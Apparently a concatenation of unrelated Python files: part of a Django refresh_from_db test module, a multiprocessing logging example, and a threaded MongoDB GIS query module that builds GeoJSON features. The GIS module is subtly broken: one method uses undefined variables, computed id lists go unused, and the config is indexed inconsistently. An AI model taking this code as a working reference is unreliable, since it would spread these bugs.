pub_date=datetime(2005, 7, 28),
)
self.assertFalse(hasattr(article, 'featured'))
FeaturedArticle.objects.create(article_id=article.pk)
article.refresh_from_db()
self.assertTrue(hasattr(article, 'featured'))
def test_refresh_clears_one_to_one_field(self):
article = Article.objects.create(
headline='Parrot programs in Python',
pub_date=datetime(2005, 7, 28),
)
featured = FeaturedArticle.objects.create(article_id=article.pk)
self.assertEqual(featured.article.headline, 'Parrot programs in Python')
article.headline = 'Parrot programs in Python 2.0'
article.save()
featured.refresh_from_db()
self.assertEqual(featured.article.headline, 'Parrot programs in Python 2.0')
def test_prefetched_cache_cleared(self):
a = Article.objects.create(pub_date=datetime(2005, 7, 28))
s = SelfRef.objects.create(article=a)
# refresh_from_db() without fields=[...]
a1_prefetched = Article.objects.prefetch_related('selfref_set').first()
self.assertCountEqual(a1_prefetched.selfref_set.all(), [s])
s.article = None
s.save()
# Relation is cleared and prefetch cache is stale.
self.assertCountEqual(a1_prefetched.selfref_set.all(), [s])
a1_prefetched.refresh_from_db()
# Cache was cleared and new results are available.
self.assertCountEqual(a1_prefetched.selfref_set.all(), [])
# refresh_from_db() with fields=[...]
a2_prefetched = Article.objects.prefetch_related('selfref_set').first()
self.assertCountEqual(a2_prefetched.selfref_set.all(), [])
s.article = a
s.save()
# Relation is added and prefetch cache is stale.
self.assertCountEqual(a2_prefetched.selfref_set.all(), [])
a2_prefetched.refresh_from_db(fields=['selfref_set'])
# Cache was cleared and new results are available.
self.assertCountEqual(a2_prefetched.selfref_set.all(), [s])
|
example_succeeded.py
|
from logging_server import LoggingServer, SocketLogger
import logging, sys
def process(process_name:str) -> None:
logger = SocketLogger(process_name)
logger.info(f"Start {process_name}")
# ... some process ...
if __name__ == "__main__":
import multiprocessing as mp
logger = logging.getLogger() # root logger
logger.addHandler(logging.StreamHandler(sys.stdout)) # output to console.
logger.setLevel(logging.NOTSET) # lowest logger level
ls = LoggingServer()
ls.start()
print("start processes.")
for i in range(10):
p = mp.Process(target=process, args=(f"process {i}",))
p.start()
|
thread_GIS.py
|
from threading import Thread,Lock
from api.GIS.config import GIS_mgdb_config
from api.GIS.database.mongoDB import MGO
import json
from api.GIS.GISStaticsFun import GisStaticsFun
class TheadFun():
def __init__(self):
pass
# self.param = param
def queryQBByIds(self,ids):
DBConfig = []
for cf in GIS_mgdb_config.dataBaseConfig:
ctype = cf['type']
if ctype == 'event' or ctype == 'org':
DBConfig.append(cf)
LocationInfo = {}
features = []
event_ids = []
org_ids = []
for id in ids:
if len(id) < 20:
org_ids.append(id)
else:
event_ids.append(id)
threads = [Thread(target=TheadFun.queryDBById,args=(cf,ids,LocationInfo)) for cf in DBConfig]
# threads_org = [Thread(target=TheadFun.queryOrgById,args=(cf,org_ids,LocationInfo)) for cf in orgDBConfig]
for t in threads:
t.start()
for t in threads:
t.join()
features = TheadFun.getFeaturesByLocationInfo(LocationInfo)
return features
@staticmethod
def queryDBById(cf, ids, LocationInfo):
cType = cf['type']
if cType == "event":
TheadFun.queryEventById(cf, ids, LocationInfo)
else:
TheadFun.queryOrgAndTarById(cf, ids, LocationInfo)
@staticmethod
def queryOrgAndTarById(cf, ids, LocationInfo):
mg = MGO(host=cf['host'], port=cf['port'], user=cf['user'], pwd=cf['pwd'],dbname=cf['dbname'])
dbName = cf['dbname']
collName = cf['collName']
fieldConfig = GIS_mgdb_config.fieldConfig
fieldconfig = fieldConfig[dbName][collName]
locationListKey = fieldconfig["locationList"]
QBIdKey = fieldconfig["QBId"]
TypeKey = fieldconfig["type"]
locationNameKey = fieldconfig["locationName"]
findObj = {QBIdKey:{'$in':ids}}
rows = mg.find(collName,findObj)
for row in rows:
try:
EventId = str(row[QBIdKey])
localName = row[locationNameKey]
locationlist = row[locationListKey]
Type = row[TypeKey]
for index,locationItem in enumerate(locationlist):
geometry = locationItem
X = str(geometry['coordinates'][0])
Y = str(geometry['coordinates'][1])
ident = "event&" + X + Y
heatAttr = GisStaticsFun.getHeatAttr(row,showHeatAttr,EventAttrKey) ## 获取热力属性
Param = TheadFun.getParam(EventId,index,eventType,heatAttr) ##获取param
location = geometry
TheadFun.getEventLocationInfo(Param,ident,location,localName,LocationInfo) ##获取locationinfo
except:
print(row["_id"] + "失败!")
@staticmethod
def queryEventById(cf, ids, LocationInfo):
mg = MGO(host=cf['host'], port=cf['port'], user=cf['user'], pwd=cf['pwd'],dbname=cf['dbname'])
dbName = cf['dbname']
collName = cf['collName']
fieldConfig = GIS_mgdb_config.fieldConfig
fieldconfig = fieldConfig[dbName][collName]
locationListKey = fieldconfig["locationList"]
QBIdKey = fieldconfig["QBId"]
SubtypeKey = fieldconfig["Subtype"]
EventAttrKey = fieldconfig["EventAttr"]
showHeatAttr = fieldconfig["showHeatAttr"]
findObj = {QBIdKey:{'$in':ids}}
rows = mg.find(collName,findObj)
for row in rows:
try:
EventId = str(row[QBIdKey])
localName = row[locationListKey][0]['name']
locationlist = row[locationListKey]
eventType = row[SubtypeKey]
for index,locationItem in enumerate(locationlist):
geometry = locationItem['geometry']
X = str(geometry['coordinates'][0])
Y = str(geometry['coordinates'][1])
ident = "event&" + X + Y
heatAttr = GisStaticsFun.getHeatAttr(row,showHeatAttr,EventAttrKey) ## 获取热力属性
Param = TheadFun.getParam(EventId,index,eventType,heatAttr) ##获取param
location = geometry
TheadFun.getEventLocationInfo(Param,ident,location,localName,LocationInfo) ##获取locationinfo
except:
print(row["_id"] + "失败!")
def exploreEvents(self,geometryStrArr):
eventsDBConfig = GIS_mgdb_config.dataBaseConfig['event']
LocationInfo = {}
features = []
threads = [Thread(target=TheadFun.spatialQueryDB,args=(cf,geometryStrArr,LocationInfo)) for cf in eventsDBConfig]
for t in threads:
t.start()
for t in threads:
t.join()
features = TheadFun.getFeaturesByLocationInfo(LocationInfo)
return features
@staticmethod
def spatialQueryDB(cf,geometryStrArr,LocationInfo):
mg = MGO(host=cf['host'], port=cf['port'], user=cf['user'], pwd=cf['pwd'],dbname=cf['dbname'])
dbName = cf['dbname']
collName = cf['collName']
fieldConfig = GIS_mgdb_config.fieldConfig
fieldconfig = fieldConfig[dbName][collName]
locationListKey = fieldconfig["locationList"]
geometryKey = fieldconfig["geometry"]
QBIdKey = fieldconfig["QBId"]
SubtypeKey = fieldconfig["Subtype"]
EventAttrKey = fieldconfig["EventAttr"]
showHeatAttr = fieldconfig["showHeatAttr"]
findOrArr = []
for geometryStr in geometryStrArr:
geometryObj = json.loads(geometryStr)
findO_point = {locationListKey:{'$elemMatch':{geometryKey:{"$within":{"$geometry":geometryObj}}}}}
findOrArr.append(findO_point)
findObj = {'$or':findOrArr}
rows = mg.find(collName,findObj)
for row in rows:
try:
EventId = str(row[QBIdKey])
localName = row[locationListKey][0]['name']
locationlist = row[locationListKey]
eventType = row[SubtypeKey]
for index,locationItem in enumerate(locationlist):
geometry = locationItem['geometry']
isIntersect = True
if len(geometry['coordinates']) == 0 or geometry['coordinates'][0] == '' or geometry['coordinates'][1] == '': #去除坐标有错误的
continue
#去除locationList中的坐标不在传入的geometry中的
if len(locationlist) > 1:
isIntersect = False
for geometryStr in geometryStrArr:
geometryObj = json.loads(geometryStr)
isIntersect = GisStaticsFun.isIntersert(geometry,geometryObj)
if isIntersect:
break
if not isIntersect: #判l断locationlist中的每一个地点是否落在所查询的范围内
continue
X = str(geometry['coordinates'][0])
Y = str(geometry['coordinates'][1])
ident = "event&" + X + Y
heatAttr = GisStaticsFun.getHeatAttr(row,showHeatAttr,EventAttrKey)
Param = TheadFun.getParam(EventId,index,eventType,heatAttr)
location = geometry
TheadFun.getEventLocationInfo(Param,ident,location,localName,LocationInfo)
except:
print(row["_id"] + "失败!")
@staticmethod
def getParam(EventId,index,eventType,heatAttr):
Param = {
"ParamId":EventId+"#"+str(index),
"QBId":EventId,
'QBType':eventType,
"heatAttr":heatAttr
}
return Param
@staticmethod
def getEventLocationInfo(Param,ident,location,localName,LocationInfo):
if(ident in LocationInfo):
EventArr = LocationInfo[ident]['Params']
EventArr.append(Param)
else:
LocationInfo[ident] = {
"Params":[Param],
"location":location,
"localName":localName
}
@staticmethod
def getFeaturesByLocationInfo(LocationInfo):
features = []
for k,v in LocationInfo.items():
location = v['location']
featureId = k
params = v['Params']
localname = v['localName']
feature = {
"type": "Feature",
"id": featureId,
"geometry": location,
"properties": {
'Params':params,
'locationName':localname,
'selectedNum':len(params)
}
}
features.append(feature)
return features
####======================================####
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.